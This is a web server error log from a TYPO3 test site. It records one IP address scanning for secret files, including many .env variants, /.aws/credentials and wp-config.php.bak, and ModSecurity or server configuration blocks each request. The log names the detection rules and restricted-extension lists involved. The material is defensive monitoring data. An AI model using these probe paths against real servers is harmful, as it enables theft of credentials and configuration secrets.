[Wed Feb 18 18:17:49.077793 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aZX0PbL5cjoaqbNB75y5UAAAAA4"]
[Wed Feb 18 18:17:49.078018 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aZX0PbL5cjoaqbNB75y5UAAAAA4"]
[Wed Feb 18 18:17:49.078205 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aZX0PbL5cjoaqbNB75y5UAAAAA4"]
[Wed Feb 18 18:17:49.150990 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aZX0PbL5cjoaqbNB75y5UQAAAA4"]
[Wed Feb 18 18:17:49.151217 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aZX0PbL5cjoaqbNB75y5UQAAAA4"]
[Wed Feb 18 18:17:49.151406 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aZX0PbL5cjoaqbNB75y5UQAAAA4"]
[Wed Feb 18 18:17:49.323214 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aZX0PbL5cjoaqbNB75y5UwAAAA4"]
[Wed Feb 18 18:17:49.323338 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aZX0PbL5cjoaqbNB75y5UwAAAA4"]
[Wed Feb 18 18:17:49.323578 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aZX0PbL5cjoaqbNB75y5UwAAAA4"]
[Wed Feb 18 18:17:49.323772 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aZX0PbL5cjoaqbNB75y5UwAAAA4"]
[Wed Feb 18 18:17:49.385444 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aZX0PbL5cjoaqbNB75y5VAAAAA4"]
[Wed Feb 18 18:17:49.385661 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aZX0PbL5cjoaqbNB75y5VAAAAA4"]
[Wed Feb 18 18:17:49.385853 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aZX0PbL5cjoaqbNB75y5VAAAAA4"]
[Wed Feb 18 18:17:49.519427 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aZX0PbL5cjoaqbNB75y5VgAAAA4"]
[Wed Feb 18 18:17:49.519650 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aZX0PbL5cjoaqbNB75y5VgAAAA4"]
[Wed Feb 18 18:17:49.519857 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aZX0PbL5cjoaqbNB75y5VgAAAA4"]
[Wed Feb 18 18:17:49.590700 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aZX0PbL5cjoaqbNB75y5VwAAAA4"]
[Wed Feb 18 18:17:49.590944 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aZX0PbL5cjoaqbNB75y5VwAAAA4"]
[Wed Feb 18 18:17:49.591186 2026] [:error] [pid 2167597] [client 195.178.110.34:57390] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aZX0PbL5cjoaqbNB75y5VwAAAA4"]
[Wed Feb 18 18:17:56.413841 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aZX0RHPppL83WAI9ZsBOfQAAAAE"]
[Wed Feb 18 18:17:56.414066 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aZX0RHPppL83WAI9ZsBOfQAAAAE"]
[Wed Feb 18 18:17:56.414255 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aZX0RHPppL83WAI9ZsBOfQAAAAE"]
[Wed Feb 18 18:17:56.458257 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aZX0RHPppL83WAI9ZsBOfgAAAAE"]
[Wed Feb 18 18:17:56.458503 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aZX0RHPppL83WAI9ZsBOfgAAAAE"]
[Wed Feb 18 18:17:56.458677 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aZX0RHPppL83WAI9ZsBOfgAAAAE"]
[Wed Feb 18 18:17:56.510428 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aZX0RHPppL83WAI9ZsBOfwAAAAE"]
[Wed Feb 18 18:17:56.510666 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aZX0RHPppL83WAI9ZsBOfwAAAAE"]
[Wed Feb 18 18:17:56.510840 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aZX0RHPppL83WAI9ZsBOfwAAAAE"]
[Wed Feb 18 18:17:57.383683 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aZX0RXPppL83WAI9ZsBOgAAAAAE"]
[Wed Feb 18 18:17:57.383911 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aZX0RXPppL83WAI9ZsBOgAAAAAE"]
[Wed Feb 18 18:17:57.384100 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aZX0RXPppL83WAI9ZsBOgAAAAAE"]
[Wed Feb 18 18:17:58.722550 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aZX0RnPppL83WAI9ZsBOgQAAAAE"]
[Wed Feb 18 18:17:58.722788 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aZX0RnPppL83WAI9ZsBOgQAAAAE"]
[Wed Feb 18 18:17:58.722992 2026] [:error] [pid 2161191] [client 195.178.110.34:45572] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aZX0RnPppL83WAI9ZsBOgQAAAAE"]
[Wed Feb 18 18:18:00.207828 2026] [:error] [pid 2162821] [client 195.178.110.34:45574] [client 195.178.110.34] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aZX0SCIBqKqS85r3VthtegAAAAo"]
[Wed Feb 18 18:18:00.208058 2026] [:error] [pid 2162821] [client 195.178.110.34:45574] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aZX0SCIBqKqS85r3VthtegAAAAo"]
[Wed Feb 18 18:18:00.208254 2026] [:error] [pid 2162821] [client 195.178.110.34:45574] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aZX0SCIBqKqS85r3VthtegAAAAo"]
[Wed Feb 18 18:18:02.209545 2026] [authz_core:error] [pid 2167592] [client 195.178.110.34:54704] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Wed Feb 18 18:18:05.571034 2026] [authz_core:error] [pid 2167592] [client 195.178.110.34:54704] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 18 18:18:06.069896 2026] [authz_core:error] [pid 2167592] [client 195.178.110.34:54704] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Wed Feb 18 18:18:06.498875 2026] [authz_core:error] [pid 2161192] [client 195.178.110.34:54716] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Feb 18 18:18:06.882733 2026] [authz_core:error] [pid 2161192] [client 195.178.110.34:54716] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Feb 18 18:18:06.957665 2026] [authz_core:error] [pid 2161192] [client 195.178.110.34:54716] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 18 18:18:06.989659 2026] [authz_core:error] [pid 2161192] [client 195.178.110.34:54716] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 18 18:18:08.731891 2026] [authz_core:error] [pid 2161248] [client 195.178.110.34:54730] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Wed Feb 18 18:18:09.313450 2026] [authz_core:error] [pid 2161190] [client 195.178.110.34:54732] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Wed Feb 18 18:18:09.350147 2026] [authz_core:error] [pid 2161190] [client 195.178.110.34:54732] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 18 18:18:09.602530 2026] [authz_core:error] [pid 2161190] [client 195.178.110.34:54732] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Feb 18 18:18:09.647925 2026] [authz_core:error] [pid 2161190] [client 195.178.110.34:54732] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Feb 18 18:18:09.691261 2026] [authz_core:error] [pid 2161190] [client 195.178.110.34:54732] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
